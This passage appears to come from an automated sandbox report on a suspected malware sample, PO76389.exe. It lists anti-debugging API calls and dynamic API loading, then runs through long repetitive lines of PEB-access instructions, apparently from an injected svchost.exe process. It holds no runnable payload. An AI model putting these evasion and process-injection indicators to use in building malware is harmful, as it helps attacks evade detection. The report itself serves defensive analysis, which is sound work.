            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_004B374E
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_004E46D0
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005EB090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_005EB090
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00DA1208 mov eax, dword ptr fs:[00000030h] 0_2_00DA1208
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00DA28E8 mov eax, dword ptr fs:[00000030h] 0_2_00DA28E8
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00DA2888 mov eax, dword ptr fs:[00000030h] 0_2_00DA2888
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h] 2_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h] 2_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B930B mov eax, dword ptr fs:[00000030h] 2_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h] 2_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03127330 mov eax, dword ptr fs:[00000030h] 2_2_03127330
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031F132D mov eax, dword ptr fs:[00000030h] 2_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315F32A mov eax, dword ptr fs:[00000030h] 2_2_0315F32A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03129353 mov eax, dword ptr fs:[00000030h] 2_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h] 2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h]2_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C mov eax, dword ptr fs:[00000030h]2_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C mov eax, dword ptr fs:[00000030h]2_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205341 mov eax, dword ptr fs:[00000030h]2_2_03205341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D437C mov eax, dword ptr fs:[00000030h]2_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF367 mov eax, dword ptr fs:[00000030h]2_2_031EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A mov eax, dword ptr fs:[00000030h]2_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A mov eax, dword ptr fs:[00000030h]2_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031533A5 mov eax, dword ptr fs:[00000030h]2_2_031533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031633A0 mov eax, dword ptr fs:[00000030h]2_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031633A0 mov eax, dword ptr fs:[00000030h]2_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320539D mov eax, dword ptr fs:[00000030h]2_2_0320539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_031EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h]2_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B63C0 mov eax, dword ptr fs:[00000030h]2_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032053FC mov eax, dword ptr fs:[00000030h]2_2_032053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031663FF mov eax, dword ptr fs:[00000030h]2_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF3E6 mov eax, dword ptr fs:[00000030h]2_2_031EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205227 mov eax, dword ptr fs:[00000030h]2_2_03205227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03167208 mov eax, dword ptr fs:[00000030h]2_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03167208 mov eax, dword ptr fs:[00000030h]2_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312823B mov eax, dword ptr fs:[00000030h]2_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h]2_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB256 mov eax, dword ptr fs:[00000030h]2_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB256 mov eax, dword ptr fs:[00000030h]2_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136259 mov eax, dword ptr fs:[00000030h]2_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BD250 mov ecx, dword ptr fs:[00000030h]2_2_031BD250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129240 mov eax, dword ptr fs:[00000030h]2_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129240 mov eax, dword ptr fs:[00000030h]2_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h]2_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h]2_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316724D mov eax, dword ptr fs:[00000030h]2_2_0316724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03159274 mov eax, dword ptr fs:[00000030h]2_2_03159274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03171270 mov eax, dword ptr fs:[00000030h]2_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03171270 mov eax, dword ptr fs:[00000030h]2_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FD26B mov eax, dword ptr fs:[00000030h]2_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FD26B mov eax, dword ptr fs:[00000030h]2_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]2_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316329E mov eax, dword ptr fs:[00000030h]2_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316329E mov eax, dword ptr fs:[00000030h]2_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205283 mov eax, dword ptr fs:[00000030h]2_2_03205283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov eax, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov eax, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov ecx, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov ecx, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C72A0 mov eax, dword ptr fs:[00000030h]2_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C72A0 mov eax, dword ptr fs:[00000030h]2_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032052E2 mov eax, dword ptr fs:[00000030h]2_2_032052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315F2D0 mov eax, dword ptr fs:[00000030h]2_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315F2D0 mov eax, dword ptr fs:[00000030h]2_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031392C5 mov eax, dword ptr fs:[00000030h]2_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031392C5 mov eax, dword ptr fs:[00000030h]2_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF2F8 mov eax, dword ptr fs:[00000030h]2_2_031EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031292FF mov eax, dword ptr fs:[00000030h]2_2_031292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]2_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03131131 mov eax, dword ptr fs:[00000030h]2_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03131131 mov eax, dword ptr fs:[00000030h]2_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]2_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137152 mov eax, dword ptr fs:[00000030h]2_2_03137152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]2_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]2_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
